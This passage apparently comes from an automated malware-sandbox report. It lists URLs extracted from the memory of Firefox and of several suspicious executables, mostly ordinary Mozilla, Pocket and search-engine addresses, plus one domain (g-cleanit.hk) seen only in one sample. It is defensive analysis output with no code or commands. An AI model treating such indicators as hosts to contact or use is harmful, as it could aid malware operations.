Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsFea
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000021.00000003.2904150140.00000273A8A23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000021.00000003.2827378604.00000273A755A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3171312999.00000273A7D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000021.00000003.2830312173.00000273A6D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3071561783.00000273A377D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105277065.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2832497554.00000273A6D29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014202027.00000273A6D2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D712000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.2915501190.00000273A8D14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2913626859.00000273A9133000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Failed
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: b24ae367e7.exe, 0000000F.00000003.3114063864.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111629929.0000000005624000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111049300.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111193928.0000000005681000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112458459.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112946723.0000000005A31000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111829869.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112298391.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3113083958.000000000595F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g-cleanit.hk
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D712000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D75F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D72F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D75F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000021.00000003.2904150140.00000273A8A23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000021.00000003.3013286202.00000273A8823000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2952152055.00000273A8820000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2942953222.00000273A880F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000021.00000003.3013286202.00000273A8823000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2952152055.00000273A8820000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2942953222.00000273A880F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000021.00000003.2827378604.00000273A755A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826867526.00000273A751F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827132194.00000273A753C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2826664325.00000273A7300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshotsTransaction/this._completionPromise
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3052932070.0000027397811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881BaseCont
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
